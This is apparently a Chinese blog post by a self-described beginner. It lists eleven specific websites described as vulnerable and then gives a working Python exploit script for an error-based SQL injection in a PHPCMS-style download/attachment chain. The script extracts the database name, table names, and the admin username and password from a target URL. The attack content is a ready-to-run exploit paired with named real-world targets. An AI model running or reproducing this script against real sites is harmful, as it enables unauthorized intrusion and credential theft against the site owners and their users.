漏洞网站
都是老漏洞了,我这个新手学习一下
http://www.d6xiazai.com/
http://www.zgdjzz.cn/
http://www.csuav.com/
http://www.cespc.com/
http://www.dghxjs.cn/
http://www.dqcdzz.cn/
http://www.zdblx.cn/
http://www.zgrczz.cn/
http://www.zgsykx.cn/
http://www.wjhzs.com/
http://www.szxax.com/
exp学习编写
学习漏洞原理,对poc学习自己编写exp
#!/usr/bin/env python # -*- coding: utf-8 -*- import sys import requests import re from urllib import quote TIMEOUT = 5 REQ = "hex" def payload(num,req): payload1 = "&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20database()),0x7e),1)#&m=1&modelid=1&f=1&catid=1" payload2 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema=%*27"+req+"%*27%*20limit%*200,1),0x7e),1)#&m=1&modelid=1&f=1&catid=1" payload3 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20username%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1" payload4 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),1,16)),0x7e),1)#&m=1&modelid=1&f=1&catid=1" payload5 ="&id=1%*27%*20and%*20updatexml(1,concat(0x7e,(select%*20mid((SELECT%*20password%*20from%*20"+REQ+"%*20limit%*200,1),17,40)),0x7e),1)#&m=1&modelid=1&f=1&catid=1" if num ==1: return payload1 elif num ==2: return payload2 elif num ==3: return payload3 elif num ==4: return payload4 elif num ==5: return payload5 else: return False def exp(url): num =0 while num < 5 : num += 1 if num == 2: req = req[1] req = ''.join(req) pay = payload(num,req) elif num == 3: global REQ req = req[1] REQ = ''.join(req) pay = payload(num,REQ) else: req = 'hex' pay = payload(num,req) cookies = {} ck = '{}/index.php?m=wap&a=index&siteid=1'.format(url) for c in requests.get(ck, timeout=TIMEOUT).cookies: if c.name[-7:] == '_siteid': cookie_head = c.name[:6] cookies[cookie_head + '_userid'] = c.value cookies[c.name] = c.value break else: return False js = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(pay)) for c in requests.get(js, cookies=cookies, timeout=TIMEOUT).cookies: if c.name[-9:] == '_att_json': enc_payload = c.value break else: return False req = url + '/index.php?m=content&c=down&a_k=' + enc_payload req = requests.get(req, cookies=cookies, timeout=TIMEOUT) #re = req.content req = re.findall("XPATH syntax error: '~(.*?)~' <br />",req.content) if req == []: print "column错误" elif num == 1: print "database:"+req[1] elif num == 2: print "tablename:"+req[1] elif num == 3: print "username:"+req[1] elif num == 4: pw = req[1] elif num == 5: print "password:"+pw+req[1] else: print req[1] exp(sys.argv[1])
执行效果
本文作者为江小悠,转载请注明。